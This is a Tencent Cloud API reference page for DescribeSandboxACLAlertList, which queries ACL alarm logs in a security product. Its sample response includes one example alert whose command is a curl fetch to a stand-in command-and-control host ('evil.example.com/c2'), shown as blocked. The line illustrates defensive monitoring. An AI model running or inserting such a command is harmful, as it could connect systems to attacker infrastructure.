tencent cloud

APIs

DescribeSandboxACLAlertList

Download
Mode fokus
Ukuran font
Terakhir diperbarui: 2026-09-01 10:05:12

1. API Description

Domain name for API request: csip.intl.tencentcloudapi.com.

This API is used to query the ACL access control alarm log list by paging. It supports precise filtering of a single alarm by Filter.Name=ID for the details page scenario.

A maximum of 20 requests can be initiated per second for this API.

We recommend you to use API Explorer
Try it
API Explorer provides a range of capabilities, including online call, signature authentication, SDK code generation, and API quick search. It enables you to view the request, response, and auto-generated examples.

2. Input Parameters

The following request parameter list only provides API request parameters and some common parameters. For the complete common parameter list, see Common Request Parameters.

Parameter Name Required Type Description
Action Yes String Common Params. The value used for this API: DescribeSandboxACLAlertList.
Version Yes String Common Params. The value used for this API: 2022-11-21.
Region No String Common Params. This parameter is not required.
Offset No Integer Offset. Default value: 0.
Limit No Integer Number of items per page. Default value: 10. Upper limit: 200.
Filters.N No Array of Filters Filter criteria.
Supported filter items:
ID: Query a single record by alarm record ID
BelongAssetType: Ownership asset type. Available values: HOST (host) / CONTAINER (container)
RuleName: search by hit rule name
RuleAction: Hit action. Available values: PASS (Allowlist) / BLOCK (Block and alarm) / MONITOR (Alarm)
InstanceId: Precise filtering by Asset Instance ID (used for viewing the alarm list of the asset on the Asset Details Page and other scenarios)
InstanceName: fuzzy search by asset instance name. The relationship between multiple values is "OR".
Status: Processing status. Available values: PENDING (Unprocessed), HANDLED (Processed), IGNORE (Ignored), PASS (Allowlisted), and BLOCK (Blocked).

3. Output Parameters

Parameter Name Type Description
Data Array of TrafficSandboxACLAlertInfo Alarm list
TotalCount Integer Total number.
RequestId String The unique request ID, generated by the server, will be returned for every request (if the request fails to reach the server for other reasons, the request will not obtain a RequestId). RequestId is required for locating a problem.

4. Example

Example1 Example of querying ACL alarm list

Input Example

POST / HTTP/1.1
Host: csip.intl.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: DescribeSandboxACLAlertList
<Common request parameters>

{
    "Filters": [
        {
            "Name": "Status",
            "Values": [
                "PENDING"
            ]
        }
    ]
}

Output Example

{
    "Response": {
        "Data": [
            {
                "ID": 7001,
                "BelongAssetType": "HOST",
                "RuleID": 2001,
"RuleName": "Forbid outbound access to unknown domain names"
                "UUID": "a1b2c3d4-e5f6-7890-abcd-ef1234567890",
                "InstanceId": "ins-a1b2c3d4",
                "InstanceName": "app-server-01",
                "ClusterId": "",
                "ContainerId": "",
                "ContainerName": "",
                "Exe": "/usr/bin/curl",
                "Param": "curl -X GET https://evil.example.com/c2",
                "Target": "GET https://evil.example.com/c2",
                "Protocol": "https",
                "Level": "HIGH",
                "Status": "PENDING",
                "Count": 12,
                "FirstAlertTime": "2025-03-10T08:00:00+08:00",
                "LastAlertTime": "2025-03-15T14:30:00+08:00",
                "RuleAction": "BLOCK"
            }
        ],
        "TotalCount": 42,
        "RequestId": "a1b2c3d4-e5f6-7890-abcd-ef1234567890"
    }
}

5. Developer Resources

SDK

TencentCloud API 3.0 integrates SDKs that support various programming languages to make it easier for you to call APIs.

Command Line Interface

6. Error Code

There is no error code related to the API business logic. For other error codes, please see Common Error Codes.

Bantuan dan Dukungan

Apakah halaman ini membantu?

masukan